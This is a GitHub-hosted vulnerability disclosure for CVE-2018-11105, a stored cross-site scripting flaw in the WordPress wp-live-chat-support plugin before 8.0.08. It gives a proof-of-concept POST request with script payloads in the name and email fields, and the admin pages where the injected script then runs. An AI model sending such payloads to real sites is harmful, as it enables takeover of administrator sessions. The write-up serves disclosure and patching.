Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
write-ups/CVE-2018-11105/
write-ups/CVE-2018-11105/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2018-11105

[Suggested description]

There is stored cross site scripting in the wp-live-chat-support plugin before 8.0.08 for
WordPress via the "name" (aka wplc_name) and "email" (aka wplc_email) input fields
whenever a malicious attacker would initiate a new chat with an
administrator.
NOTE: this issue exists because of an incomplete fix for CVE-2018-9864.

[Additional Information]

The following POST request was used for leveraging the XSS attack:

 ```
POST /wp-json/wp_live_chat_support/v1/start_chat HTTP/1.1
    ...
    header info
    ...
    Connection: close
    
    relay_action=wplc_new_chat&
    security=<token&
    cid=<cid&
    wplc_name=<scriptalert("evil payload in name");</script&
    wplc_email=<scriptalert("evil payload in mail");</script&
    wplc_extra_data%5Bobject_switch%5D=1&
    url=http%3A%2F%2Flocalhost%3A8000%2F&
    session=<session&
    server_token=<token&
    token=<token&_wpnonce=<nonce
```

 Notice that the wplc_name and wplc_email were effectively used to deliver the payload to the WordPress backend.

[Vulnerability Type]

Cross Site Scripting (XSS)

[Vendor of Product]

CodeCabin_ / WP-livechat

[Affected Product Code Base]

WP live chat support - All versions < 8.0.08

[Affected Component]

WP live chat support - all versions < 8.0.08

[Attack Type]

Remote

[CVE Impact Other]

Stored Cross Site Scripting

[Attack Vectors]

A malicious attacker that initiates a chat with an administrator can
abuse the "name" and "email" form fields that are presented by the
wp-live-chat plugin to inject malicious javascript. After the chat is
either ended or missed by the administrator interaction with the
following pages will trigger the malicious javascript:

http://<target-url/wp-admin/admin.php?page=wplivechat-menu-history
http://<target-url/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id

http://<target-url/wp-admin/admin.php?page=wplivechat-menu-missed-chats
http://<target-url/wp-admin/admin.php?page=wplivechat-menu&action=history&cid=<infected-chat-id

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Riccardo ten Cate

[Reference]

https://github.com/RiieCco/write-ups/tree/master/CVE-2018-11105